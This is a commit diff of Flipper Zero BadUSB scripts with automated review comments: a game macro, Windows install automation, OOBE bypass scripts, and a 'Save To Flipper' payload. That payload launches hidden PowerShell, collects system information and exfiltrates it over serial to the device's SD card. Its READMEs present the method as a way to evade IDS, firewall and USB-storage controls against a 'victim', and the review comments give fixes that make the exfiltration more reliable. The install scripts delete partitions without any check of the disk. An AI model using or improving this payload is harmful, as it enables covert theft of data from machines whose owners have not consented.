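Review bot: `PID=$(pgrep RDR2.exe)` can be empty or hold several PIDs, because `pgrep` treats the argument as a regex matched against process names and the unescaped `.` matches any character; when it is empty both `kill` lines fail and nothing is paused, and the trailing `exit` closes the terminal regardless. `STRING PID=$(pgrep -x RDR2.exe) && kill -s SIGSTOP $PID` and the matching `STRING [ -n "$PID" ] && kill -s SIGCONT $PID` only signal when a process was actually found. A DELAY of 7000 with the game stopped is a hard-coded guess, as the comment admits, so a `WAIT_FOR_BUTTON_PRESS` before SIGCONT would let the operator decide.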
@ -0,0 +1,3 @@
|
||||
For Red Dead Redemption 2 on PC
|
||||
|
||||
Works as a macro to hold down the button that lets the player craft ammo. This is especially useful for split bullets.
|
@ -0,0 +1,4 @@
|
||||
REM Use BadUSB to hold down the button (Enter) to make split bullets in RDR2 for 500 seconds (a little over 8 minutes)
|
||||
|
||||
HOLD ENTER
|
||||
DELAY 500000
|
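--- /dev/null
+++ b/BadUSB/emptythevoid-BadUSB/save-to-flipper/latest.txt
@@ -0,0 +1,73 @@
+REM Title: Save To Flipper
+REM Author: emptythevoid and LupusE
+REM Target: Windows 10, Windows 11
+REM Version: 1.1
+REM Category: PoC
+
+REM The Device IDs (defaults are HID\\VID_046D\&PID_C529 USB\\VID_0483\&PID_5740 )
+REM The Baud rate (default is 230400)
+
+REM Open Powershell
+DELAY 500
+GUI r
+DELAY 500
+
+REM Run Powershell by full path to avoid Windows Terminal. Launch hidden.
+STRING %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -w h
+
+DELAY 500
+ENTER
+DELAY 750
+
+REM Once payload is deployed and the Flipper is backed out to normal mode, the script will determine which COM port the Flipper is plugged in to by searching for the USB ID. It will then write the output (string) of the executed command to the specified path and file on the Flipper's SD card.
+
+REM ## Command to execute/data to exfiltrate. Don't forget cast to string.
+ALTSTRING $d=(Get-ComputerInfo|Out-String);
+
+REM ## The VendorID and ProductID to Match. If you'd change the BadUSB IDs in the BadKB app or in this script, you need to change these values to match. Otherwise Powershell won't detect the Flipper when it returns to normal mode.
+ALTSTRING $BHID="HID\\VID_046D\&PID_C529";
+ALTSTRING $SUSB="USB\\VID_0483\&PID_5740";
+
+REM ## The path on the Flipper's SD card to store the exfliltrated data
+ALTSTRING $SPATH="/ext/apps_data/exfil_data"
+ENTER
+
+REM ## Perform 600 loops, to check if BadUSB is still active, wait 1 sec. If the Flipper is just disconnected, the loop will wait 4 sec.
+
+ALTSTRING 1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(((Get-PNPDevice -PresentOnly|Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"}) -split "COM")[1][0])",230400,'None',8,'one');$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();exit}Catch{Sleep 1}}
+
+ENTER
+
+REM Flash Capslock to indicate when to back out of BadUSB mode
+CAPSLOCK
+DELAY 100
+CAPSLOCK
+DELAY 100
+CAPSLOCK
+DELAY 100
+CAPSLOCK
+DELAY 100
+CAPSLOCK
+DELAY 100
+CAPSLOCK
+DELAY 100
+CAPSLOCK
+DELAY 100
+CAPSLOCK
+DELAY 100
+CAPSLOCK
+DELAY 100
+CAPSLOCK
+DELAY 100
+CAPSLOCK
+DELAY 100
+CAPSLOCK
+DELAY 100
+CAPSLOCK
+DELAY 100
+CAPSLOCK
+DELAY 100
+CAPSLOCK
+DELAY 100
+CAPSLOCK
+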
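Review bot: The COM port lookup in the typed one-liner keeps only the first character after `COM` (`-split "COM")[1][0]`), so a Flipper enumerated as COM10 or higher is opened as COM1 and all 600 retries fail; the serial test script elsewhere in this commit already targets COM10, so this is not hypothetical. Taking the whole number from the Ports-class device's friendly name, which Windows renders as `… (COMn)`, avoids that: `"COM$((Get-PNPDevice -PresentOnly|Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"}).FriendlyName -replace '^.*\(COM(\d+)\).*$','$1')"`. `$BHID` is assigned but never read in this version, so the REM saying both IDs must match is only true of `$SUSB`, and the REM about a 4-second wait describes a branch the Catch block (`Sleep 1`) no longer has.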
@ -0,0 +1,73 @@
|
||||
REM Title: Save To Flipper (no altstring)
|
||||
REM Author: emptythevoid and LupusE
|
||||
REM Target: Windows 10, Windows 11
|
||||
REM Version: 1.1
|
||||
REM Category: PoC
|
||||
|
||||
REM The Device IDs (defaults are HID\\VID_046D\&PID_C529 USB\\VID_0483\&PID_5740 )
|
||||
REM The Baud rate (default is 230400)
|
||||
|
||||
REM Open Powershell
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
|
||||
REM Run Powershell by full path to avoid Windows Terminal. Launch hidden.
|
||||
STRING %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -w h
|
||||
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 750
|
||||
|
||||
REM Once payload is deployed and the Flipper is backed out to normal mode, the script will determine which COM port the Flipper is plugged in to by searching for the USB ID. It will then write the output (string) of the executed command to the specified path and file on the Flipper's SD card.
|
||||
|
||||
REM ## Command to execute/data to exfiltrate. Don't forget cast to string.
|
||||
STRING $d=(Get-ComputerInfo|Out-String);
|
||||
|
||||
REM ## The VendorID and ProductID to Match. If you'd change the BadUSB IDs in the BadKB app or in this script, you need to change these values to match. Otherwise Powershell won't detect the Flipper when it returns to normal mode.
|
||||
STRING $BHID="HID\\VID_046D\&PID_C529";
|
||||
STRING $SUSB="USB\\VID_0483\&PID_5740";
|
||||
|
||||
REM ## The path on the Flipper's SD card to store the exfliltrated data
|
||||
STRING $SPATH="/ext/apps_data/exfil_data"
|
||||
ENTER
|
||||
|
||||
REM ## Perform 600 loops, to check if BadUSB is still active, wait 1 sec. If the Flipper is just disconnected, the loop will wait 4 sec.
|
||||
|
||||
STRING 1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(((Get-PNPDevice -PresentOnly|Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"}) -split "COM")[1][0])",230400,'None',8,'one');$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();exit}Catch{Sleep 1}}
|
||||
|
||||
ENTER
|
||||
|
||||
REM Flash Capslock to indicate when to back out of BadUSB mode
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
DELAY 100
|
||||
CAPSLOCK
|
||||
|
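Review bot: The REM before the retry loop says that when the Flipper is simply disconnected the loop waits 4 seconds, but the typed Catch block only does `Sleep 1`; the 4-second branch exists in the PoC variant further down this commit and was dropped here without updating the comment, which should read `REM ## Try up to 600 times, one second apart, to open the Flipper's serial port; PowerShell exits once the write succeeds`. `$BHID` is typed but never referenced, so either drop the `STRING $BHID=...` line or make the comment above it say that only `$SUSB` is matched. The port number is also read as the single character after `COM` (`[1][0]`), exactly as in the ALTSTRING variant, so COM10 and above are mis-parsed as COM1 and both files need the same fix.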
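--- /dev/null
+++ b/BadUSB/emptythevoid-BadUSB/save-to-flipper/readme.md
@@ -0,0 +1,49 @@
+# Save data from your BadUSB scripts directly to the Flipper's SD Card!
+
+Inspired by this thread: https://forum.flipperzero.one/t/anyway-to-save-files-back-to-the-flipper-using-badusb/2372
+
+Credit: Major credit to @LupusE for taking my original proof-of-concept, running with it, and making a proper example payload!
+
+Changes since original proof-of-concept:
+
+- Increased baud rate from 115200 to 230400 (thanks for the suggestion Caribou!)
+
+- Add capslock flashing to indicate when it's time to exit BadUSB mode
+
+- Starts powershell hidden by default
+
+- Bypasses Windows Terminal and invokes powershell directly
+
+- Fast STRING and slower (but more compatible) ALTSTRING versions
+
+Targets Windows 10, 11
+
+BadUSB script that uses inline Powershell to enumerate which COM port the Flipper is connected to,
+and then use Powershell's serial module to interface with Flipper's CLI and write text data to a specified file in Flipper's SD Card. It will automatically detect when the Flipper has exited BadUSB mode before writing the data to the SD card.
+
+## What makes this method unique?
+There are plenty of examples of using Ducky Script to exfiltrate data. Exfiltration by webhook/discord can be detected/blocked by IDS and firewall rules. Exfiltration by copying data to a USB flash drive (mass storage driver) can be thwarted by rules disallowing access to USB mass storage devices. The "Save to Flipper" POC makes use of Windows' COM ports and the Powershell serial module. This traffic is much more problematic to block, as many legitimate things can use the COM ports, and it is not affected by blocking access to mass storage devices. Further, you can tweak the device ID to further bypass any restrictions.
+
+## Limitations:
+Using serial to interface to the Flipper's CLI in order to save a file is *slow.* This is not a huge problem for small amounts of text data, but could be problematic for a larger exfiltration.
+
+There also appears to be some kind of buffer size limit that will cause the exfiltrated data to fail to save. This is being investigated.
+
+## Usage:
+Attach Flipper to computer by USB cable and run the BadUSB script. Watch the victim's keyboard for the caps lock light to blink a few times. Once it stops blinking, hit Back enough times to get to the Flipper application list (otherwise it won't save the data) and wait a moment and then remove the Flipper. (how long you need to wait depends on how large an exfil you're doing - it's slow)
+
+## Variables:
+$d is the command who's output you want to exfiltrate to the Flipper's storage. Make sure to include |Out-String as the last part of the command.
+
+$BHID and $BPID allow you to specify the Device ID parameters of your Flipper.
+
+$SPATH is the location on the SD card to store your exfiltrated data. By default, it saves to /ext/apps_data/exfil_data
+
+## Example
+This example runs the Get-ComputerInfo command and saves it to the Flipper's SD card under /ext/apps_data/exfil_data
+
+## Note about early disconnection
+If the Flipper is disconnected from the host computer *while* it is receiving the exfiltrated data, the Flipper may remain stuck with it's serial CLI open, which will cause it to have an error when connecting it to qFlipper. Simply reboot the Flipper to get it working normally again.
+
+## STRING vs ALTSTRING
+There are two versions of this payload. One uses STRING, which is faster but depends on the keyboard layout. ALTSTRING is able to work with different keyboard layouts, but is much slower to deploy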
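--- /dev/null
+++ b/BadUSB/emptythevoid-BadUSB/save_to_flipper_poc/README.md
@@ -0,0 +1,36 @@
+# Save data from your BadUSB scripts directly to the Flipper's SD Card!
+
+Inspired by this thread: https://forum.flipperzero.one/t/anyway-to-save-files-back-to-the-flipper-using-badusb/2372
+
+Credit: Major credit to @LupusE for taking my original proof-of-concept, running with it, and making a proper example payload!
+
+This proof of concept is for Windows-only.
+
+BadUSB script that uses inline Powershell to enumerate which COM port the Flipper is connected to,
+and then use Powershell's serial module to interface with Flipper's CLI and write text data to a specified file in Flipper's SD Card. It will automatically detect when the Flipper has exited BadUSB mode before writing the data to the SD card.
+
+## What makes this method unique?
+There are plenty of examples of using Ducky Script to exfiltrate data. Exfiltration by webhook/discord can be detected/blocked by IDS and firewall rules. Exfiltration by copying data to a USB flash drive (mass storage driver) can be thwarted by rules disallowing access to USB mass storage devices. The "Save to Flipper" POC makes use of Windows' COM ports and the Powershell serial module. This traffic is much more problematic to block, as many legitimate things can use the COM ports, and it is not affected by blocking access to mass storage devices. Further, you can tweak the device ID to further bypass any restrictions.
+
+## Limitations:
+Using serial to interface to the Flipper's CLI in order to save a file is *slow.* This is not a huge problem for small amounts of text data, but could be problematic for a larger exfiltration.
+
+There also appears to be some kind of buffer size limit that will cause the exfiltrated data to fail to save. This is being investigated.
+
+## Usage:
+Attach Flipper to computer by USB cable and run the BadUSB script. When the Flipper shows 100% completion, hit Back enough times to get to the Flipper application list (otherwise it won't save the data) and wait a moment and then remove the Flipper.
+
+## Variables:
+$d is the command who's output you want to exfiltrate to the Flipper's storage. Make sure to include |Out-String as the last part of the command.
+
+$BHID and $BPID allow you to specify the Device ID parameters of your Flipper.
+
+$SPATH is the location on the SD card to store your exfiltrated data. By default, it saves to /ext/apps_data/exfil_data
+
+## Example
+This proof-of-concept stores the output of the Powershell Get-ComputerInfo
+
+There are two payload examples included in the script. One will output to the Powershell console the state of the Flipper (BadUSB/NoFZ) to help you learn how to Back out of the BadUSB application and the timing. The other payload is without debugging and without a delay if the Flipper is simply disconnected.
+
+## Note about early disconnection
+If the Flipper is disconnected from the host computer *while* it is receiving the exfiltrated data, the Flipper may remain stuck with it's serial CLI open, which will cause it to have an error when connecting it to qFlipper. Simply reboot the Flipper to get it working normally again.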
@ -0,0 +1,41 @@
|
||||
REM Title: Save To Flipper PoC
|
||||
REM Author: emptythevoid and LupusE
|
||||
REM Target: Windows 10 (not tested on Windows 11, yet)
|
||||
REM Version: 1.0
|
||||
REM Category: PoC
|
||||
|
||||
REM Open Powershell
|
||||
DELAY 500
|
||||
GUI r
|
||||
DELAY 500
|
||||
|
||||
REM Optionally run powershell hidden
|
||||
REM STRING powershell -w h
|
||||
|
||||
REM Comment out the below line if you're using the optional hidden window above
|
||||
STRING powershell
|
||||
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 750
|
||||
|
||||
REM The powershell starts with a delay. This is to give you time to hit BACK twice on the Flipper to get it out of BadUSB mode. Otherwise it wont save data.
|
||||
REM If the normal FZ mode is detected, the script will determine which COM port the Flipper is plugged in and write a string to the specified path/file.
|
||||
|
||||
REM ## Command to execute/data to extract. Don't forget cast to string.
|
||||
ALTSTRING $d=(Get-ComputerInfo|Out-String);
|
||||
|
||||
REM ## The VendorID and ProductID to search. If you'd change the BadUSB IDs in this script, you need to change $BHID as well.
|
||||
ALTSTRING $BHID="HID\\VID_046D\&PID_C529";
|
||||
ALTSTRING $SUSB="USB\\VID_0483\&PID_5740";
|
||||
REM Teh trorage Path where the result is SPATHed at the Flipper Zero SD card
|
||||
ALTSTRING $SPATH="/ext/apps_data/exfil_data"
|
||||
ENTER
|
||||
|
||||
DELAY 1000
|
||||
REM ## Perform 600 loops, to check if BadUSB is still active, wait 1 sec. If the Flipper is just disconnected, the loop will wait 4 sec.
|
||||
ALTSTRING 1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(((Get-PNPDevice -PresentOnly|Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"}) -split "COM")[1][0])",115200,'None',8,'one');$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();break}Catch{If(Get-PNPDevice -PresentOnly|Where {$_.InstanceID -match $BHID}){"BadUSB"}Else{"NoFZ";Start-Sleep 4};Start-Sleep 1}}
|
||||
REM ## Shorter Version, without debug output, no 4 Sec delay, exits powershell upon completion (useful when using powershell -w h)
|
||||
REM ALTSTRING 1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(((Get-PNPDevice -PresentOnly -Class 'Ports' -InstanceID 'USB\VID_0483&PID_5740*') -split "COM")[1][0])",115200,'None',8,'one');$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($d);$p.Write("$([char] 3)");$p.Close();break}Catch{Sleep 1}};exit
|
||||
|
||||
ENTER
|
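Review bot: Inside the retry loop `$p.open()` succeeds before the writes run, so if `Write` or `Close` throws the port is left open by this process, every later `New-Object`/`open()` on the same port then typically fails with an access-denied error, and the 600-iteration retry degrades into a ten-minute spin that can never deliver the data. Closing the port in a `Finally{If($p -and $p.IsOpen){$p.Close()}}` clause inside the loop body fixes that and is a no-op when the port already closed normally. The REM above `$SPATH` is garbled (`Teh trorage Path where the result is SPATHed`) and should read `REM ## The path on the Flipper's SD card where the result is stored`.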
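--- /dev/null
+++ b/BadUSB/emptythevoid-BadUSB/win10_install/README.md
@@ -0,0 +1,13 @@
+Ducky scripts for the Flipper to automate the GUI for installing Windows 10 Pro, 22H2. Emphasis is on automation, not efficiency (longer delays than necessary)
+
+Part 1 handles the intial setup, including removing any existing partitions and letting Windows create a new scheme.
+
+Part 2 Handles the rest of the setup. It is configured to *always* click "I don't have internet", as trying to get Ducky Script to select the correct Wifi SSID from the list is unpredictable. NOTE: you have to choose in the script which version to run - the one where you have no wifi at all, or the one where you have wifi and at least one access point will show up when it scans for access points. This part also handles creation of the initial local user account. Make sure to fill in the STRINGs that contain the information required: User, Password, and three security answers (the script assumes these aren't important so it always selects the first one from the drop down - adjust as you desire)
+
+Notes about timing: The script implicitly assumes that your computer is relatively fast with an SSD/NVME drive. If the timing is wrong, most commands will accidentally turn on voice assistant. That said, take care when the account is created. If it goes too quickly, it's possible that your password could be added as a user account!
+
+TODO:
+
+-Need to add optional code block for when Ethernet and/or Wifi is available (currently it operates under the assumption that internet isn't available)
+
+-Probably need to set a standard longer delay for part 2, since so many Delay 100 is needed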
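--- a/BadUSB/emptythevoid-BadUSB/win10_install/win10_part1.txt
+++ b/BadUSB/emptythevoid-BadUSB/win10_install/win10_part1.txt
@@ -0,0 +1,86 @@
+REM Automate the first part of Windows 10 install.
+
+REM Target: Windows 10 Pro 22H2
+
+REM Emphasis is on automating the procedure, not efficiency (longer than necessary delays)
+REM Start at the Language selection screen
+
+REM Enter language and click Next. Assume defaults.
+TAB
+TAB
+TAB
+ENTER
+DELAY 100
+
+REM Click Install Now
+ENTER
+DELAY 20000
+
+REM Windows license
+SPACE
+TAB
+ENTER
+DELAY 100
+
+REM Type of install = Custom
+TAB
+ENTER
+DELAY 500
+
+REM Remove all partitions and start fresh
+REM Note: If default partitions are absent, it still creates the partitions and completes
+REM Defaults to "Primary"
+TAB
+TAB
+ENTER
+DELAY 100
+LEFT
+ENTER
+DELAY 500
+REM Now at System
+TAB
+TAB
+ENTER
+DELAY 100
+LEFT
+ENTER
+DELAY 500
+REM Now at "unallocated"
+DOWN
+REM now at "MSR"
+TAB
+TAB
+ENTER
+DELAY 100
+LEFT
+ENTER
+DELAY 500
+REM back at "unallocated"
+DOWN
+REM now at "recovery"
+TAB
+TAB
+ENTER
+DELAY 100
+LEFT
+ENTER
+DELAY 15000
+REM now at 100% unallocated. Click New
+TAB
+TAB
+ENTER
+DELAY 100
+REM use all space (default)
+TAB
+ENTER
+DELAY 100
+REM notice about additional partitions
+ENTER
+DELAY 5000
+REM press Next
+TAB
+TAB
+TAB
+TAB
+TAB
+ENTER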
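Review bot: The partition-removal sequence at L3540–L3651 deletes the Primary, System, MSR and Recovery entries on whichever disk Setup lists first, with no check that it is the intended drive, and the header says nothing about that; on a machine with a second internal disk or a plugged-in data drive the wrong disk can be wiped. Add to the header `REM WARNING: destructive - unconditionally deletes every partition on the disk Setup shows first; disconnect all other drives before running`. Because every step is a fixed DELAY followed by blind TAB/ENTER/LEFT presses, a `REM` stating the layout this was written against (four existing partitions, as the comments at L3546–L3630 walk through) would let a user judge whether a differently partitioned disk will be handled, beyond the single note at L3543.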
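--- a/BadUSB/emptythevoid-BadUSB/win10_install/win10_part2.txt
+++ b/BadUSB/emptythevoid-BadUSB/win10_install/win10_part2.txt
@@ -0,0 +1,156 @@
+REM Automate second half of Windows 10 install
+
+REM Target: Windows 10 Pro 22H2
+
+REM Run this at the "Let's start with the region" screen
+
+REM FLIPPER DOESN'T SUPPORT VARIABLES??
+REM Enter in variables here for local user, password, and 3 security answers
+REM VAR $USER =
+REM VAR $PASSWORD =
+REM VAR $RANDOM1 =
+REM VAR $RANDOM2 =
+REM VAR $RANDOM3 =
+
+REM Defaults to United States
+ENTER
+DELAY 5000
+
+REM Defaults to US keyboard layout
+ENTER
+DELAY 5000
+
+REM Add second keyboard layout. Defaults to Skip
+ENTER
+DELAY 5000
+
+REM No internet available, but assume wifi works and detects at least one access point
+REM Need to insert a long delay in case it enumerates Wifi networks
+DELAY 15000
+TAB
+DELAY 100
+TAB
+DELAY 100
+TAB
+DELAY 100
+REM Should be on "I don't have internet"
+ENTER
+DELAY 5000
+
+
+REM No Internet Available, no wifi at all
+REM TAB
+REM ENTER
+REM DELAY 5000
+
+REM Continue with limited setup. Defaults to Connect Now
+TAB
+DELAY 100
+TAB
+DELAY 100
+TAB
+DELAY 100
+TAB
+DELAY 100
+TAB
+DELAY 100
+ENTER
+DELAY 5000
+
+REM Who's going to use this PC?
+STRING
+ENTER
+DELAY 5000
+
+REM Create a super memorable password
+STRING
+ENTER
+DELAY 5000
+
+REM Confirm password
+STRING
+ENTER
+DELAY 5000
+
+REM Security question 1
+DOWN
+TAB
+STRING
+ENTER
+DELAY 5000
+
+REM Security question 2
+DOWN
+TAB
+STRING
+ENTER
+DELAY 5000
+
+REM Security question 3
+DOWN
+TAB
+STRING
+ENTER
+DELAY 5000
+
+REM Skip face sign-in
+TAB
+DELAY 100
+TAB
+DELAY 100
+TAB
+DELAY 100
+ENTER
+DELAY 5000
+
+REM disable all privacy defaults
+TAB
+DELAY 100
+TAB
+DELAY 100
+TAB
+DELAY 100
+TAB
+DELAY 100
+TAB
+DELAY 100
+SPACE
+DELAY 100
+TAB
+DELAY 100
+SPACE
+DELAY 100
+TAB
+DELAY 100
+SPACE
+DELAY 100
+TAB
+DELAY 100
+SPACE
+DELAY 100
+TAB
+DELAY 100
+SPACE
+DELAY 100
+TAB
+DELAY 100
+SPACE
+DELAY 100
+ENTER
+DELAY 5000
+
+REM Just say No to Cortana
+TAB
+DELAY 100
+TAB
+DELAY 100
+TAB
+DELAY 100
+TAB
+DELAY 100
+TAB
+DELAY 100
+ENTER
+
+
+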
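Review bot: The account placeholders at L3888, L3902 and L3916 are bare `STRING` lines, so the file as shipped types nothing and then presses ENTER at each prompt; once they are filled in, the account password sits in cleartext on the Flipper's SD card and is typed blind into whatever control has focus, which the README (L3434) admits can end with the password submitted as a visible account name. Add near the top `REM SECURITY: the password below is stored in cleartext on the SD card and typed without any focus check - use a throwaway value, change it after first login, and delete this file from the card`. The comment at L3734 (`REM FLIPPER DOESN'T SUPPORT VARIABLES??`) leaves an open question in the shipped file; either resolve it or replace the five `REM VAR` lines with a plain `REM Fill in the empty STRING lines below: user, password, password again, three security answers` so a reader knows where the values actually go.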
@ -0,0 +1,30 @@
|
||||
REM enable the OOBE bypass to allow local account on windows 11
|
||||
REM This file will enable the bypass and reboot the computer
|
||||
|
||||
SHIFT F10
|
||||
DELAY 1000
|
||||
HOLD ALT
|
||||
DELAY 1000
|
||||
HOLD TAB
|
||||
DELAY 500
|
||||
RIGHT
|
||||
DELAY 200
|
||||
RELEASE TAB
|
||||
DELAY 500
|
||||
RELEASE ALT
|
||||
DELAY 1000
|
||||
SHIFT F10
|
||||
DELAY 1000
|
||||
HOLD ALT
|
||||
DELAY 1000
|
||||
HOLD TAB
|
||||
DELAY 500
|
||||
RIGHT
|
||||
DELAY 200
|
||||
RELEASE TAB
|
||||
DELAY 500
|
||||
RELEASE ALT
|
||||
DELAY 1000
|
||||
STRING OOBE\BYPASSNRO
|
||||
DELAY 1000
|
||||
ENTER
|
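Review bot: The `SHIFT F10` plus held-ALT/TAB focus block appears twice back to back (L4175–L4208 and L4211–L4244) before `OOBE\BYPASSNRO` is typed at L4247; as far as the visible keystrokes show, this opens a second command prompt rather than reusing the first, and no `REM` says whether the repeat is deliberate focus recovery. Either drop the second block or annotate it with `REM second SHIFT F10 + ALT-TAB is intentional: the first prompt sometimes opens without focus`. The win11 readme in this same commit (L4424) marks these bypass scripts as probably obsolete; the header at L4167 should say so and point users at win11_install_part2.txt, which achieves the same local-account outcome by releasing DHCP.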
@ -0,0 +1,33 @@
|
||||
REM enable the OOBE bypass to allow local account on windows 11
|
||||
REM This is an optional second step, that will release DHCP addresses.
|
||||
REM Use this after the computer has rebooted from part 1
|
||||
|
||||
SHIFT F10
|
||||
DELAY 1000
|
||||
HOLD ALT
|
||||
DELAY 1000
|
||||
HOLD TAB
|
||||
DELAY 500
|
||||
RIGHT
|
||||
DELAY 200
|
||||
RELEASE TAB
|
||||
DELAY 500
|
||||
RELEASE ALT
|
||||
DELAY 1000
|
||||
SHIFT F10
|
||||
DELAY 1000
|
||||
HOLD ALT
|
||||
DELAY 1000
|
||||
HOLD TAB
|
||||
DELAY 500
|
||||
RIGHT
|
||||
DELAY 200
|
||||
RELEASE TAB
|
||||
DELAY 500
|
||||
RELEASE ALT
|
||||
DELAY 1000
|
||||
STRING ipconfig /release
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING EXIT
|
||||
ENTER
|
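--- a/BadUSB/emptythevoid-BadUSB/win11_install/readme.md
+++ b/BadUSB/emptythevoid-BadUSB/win11_install/readme.md
@@ -0,0 +1,25 @@
+Windows 11 installer helpers. You must use these with a fresh Windows 11 ISO installer on a USB boot drive.
+
+These will likely fail to work as expected when the computer is set up with an OEM install.
+
+These come in two parts:
+
+Part 1- Handles the initial setup of wiping out any existing partitions, setting up the disk, and installing Windows. No customization is needed here.
+
+Part 2- Handles the "setup" after install. You need to modify a few things for your setup:
+
+youruser
+
+yourpassword
+
+security 1
+
+security 2
+
+security 3
+
+It is highly recommended NOT to have your computer connected to Ethernet when you perform the installation, otherwise it will perform updates and try to make you use a Microsoft account.
+
+If, however, Ethernet is plugged in, Part 2 will release the DHCP IP address before setup. Once the setup is complete, Flipper will PAUSE and wait for a button press. Perform this after the computer is safely at the desktop. This will renew the IP configuration.
+
+The OOBE bypass scripts are likely not needed and obsolete.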
@ -0,0 +1,84 @@
|
||||
REM Handle first phase of Windows 11 installation, 22H2, 23H2
|
||||
|
||||
REM Author: emptythevoid
|
||||
|
||||
REM Next
|
||||
ALT y
|
||||
|
||||
DELAY 100
|
||||
|
||||
REM Install Now
|
||||
ENTER
|
||||
|
||||
DELAY 20000
|
||||
|
||||
REM License
|
||||
SPACE
|
||||
|
||||
ALT n
|
||||
DELAY 2000
|
||||
|
||||
REM Type of Installation - Custom
|
||||
|
||||
ALT c
|
||||
DELAY 1000
|
||||
|
||||
REM Delete any and all partitions
|
||||
REM should be able to simply repeate this over and over after the fisrt one
|
||||
REM as soon as all are gone, the command will trigger the Next button
|
||||
REM and begin installation
|
||||
|
||||
ALT d
|
||||
DELAY 200
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
REM repeat the blocks below for however many partitions you think you'll need to remove
|
||||
|
||||
DOWN
|
||||
ALT d
|
||||
DELAY 200
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
DOWN
|
||||
ALT d
|
||||
DELAY 200
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 200
|
||||
|
||||
DOWN
|
||||
ALT d
|
||||
DELAY 200
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
DOWN
|
||||
ALT d
|
||||
DELAY 200
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
DOWN
|
||||
ALT d
|
||||
DELAY 200
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
REM one up arrow partition removal, for safety
|
||||
UP
|
||||
ALT d
|
||||
DELAY 200
|
||||
TAB
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM Assume that NO partitions exist.
|
||||
ALT n
|
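Review bot: `DELAY 200` at L4565 sits where every sibling deletion block uses `DELAY 2000` (L4520, L4545, L4585, L4605, L4625), so the third `ALT d` / TAB / ENTER cycle gives Setup a tenth of the time before the next `DOWN` and `ALT d` fire; that reads like a dropped zero, and in a script whose only job is deleting partitions a mistimed keystroke lands on an unintended control. Change it to `DELAY 2000`. The header should also carry the caveat the readme leaves implicit: `REM WARNING: deletes every partition on the disk Setup lists first, without checking which disk it is - disconnect all other drives before running`, since the loop at L4508–L4648 is unconditional and the final `ALT n` at L4658 starts installation regardless of what was deleted.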
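--- a/BadUSB/emptythevoid-BadUSB/win11_install/win11_install_part2.txt
+++ b/BadUSB/emptythevoid-BadUSB/win11_install/win11_install_part2.txt
@@ -0,0 +1,171 @@
+REM Win11 Install part 2 23H2
+
+REM Author: emptythevoid
+
+REM If your device uses wifi, don't join it to any network and it should work properly
+REM This script will release DHCP so that it won't try to check for updates and
+REM attempt to use a Microsoft account
+REM The script will pause after privacy settings are entered.
+REM Wait until you're safely at the Windows desktop and press the OK button to renew DHCP
+
+REM Release DHCP
+SHIFT F10
+DELAY 1000
+
+REM HOLD ALT
+REM DELAY 1000
+REM TAB
+REM DELAY 100
+REM TAB
+REM DELAY 100
+REM RELEASE ALT
+
+CTRL-ALT TAB
+
+DELAY 1000
+RIGHT ARROW
+DELAY 100
+ENTER
+
+DELAY 1000
+STRING ipconfig /release
+ENTER
+DELAY 5000
+STRING EXIT
+ENTER
+DELAY 500
+
+CTRL-ALT TAB
+DELAY 100
+ENTER
+DELAY 100
+
+REM are we still defaulted to Enter->YES ? NO.
+TAB
+TAB
+
+
+REM Country or Region
+ENTER
+DELAY 5000
+
+REM Keyboard layout
+ENTER
+DELAY 5000
+
+REM Skip second keyboard layout
+ENTER
+DELAY 5000
+
+REM Connect to Wifi - Choose I don't have Internet
+SHIFT TAB
+SPACE
+DELAY 5000
+
+REM Continue with limited setup
+SHIFT TAB
+SPACE
+DELAY 5000
+
+REM who is going to use this device
+STRING <yourusername>
+ENTER
+DELAY 500
+
+REM Password
+STRING <your password>
+ENTER
+DELAY 500
+STRING <your password>
+ENTER
+DELAY 500
+
+REM Security Questions
+DOWN
+TAB
+STRING <security 1>
+ENTER
+DELAY 200
+DOWN
+TAB
+STRING <security 2>
+ENTER
+DELAY 200
+DOWN
+TAB
+STRING <security 3>
+ENTER
+DELAY 5000
+
+REM Choose privacy settings
+REM CANNOT tab forward, because it may break depending on if there is a sound icon or not
+REM use SHIFT TAB to back up to the top
+REM how many times? 7
+
+SHIFT TAB
+DELAY 100
+SHIFT TAB
+DELAY 100
+SHIFT TAB
+DELAY 100
+SHIFT TAB
+DELAY 100
+SHIFT TAB
+DELAY 100
+SHIFT TAB
+DELAY 100
+SHIFT TAB
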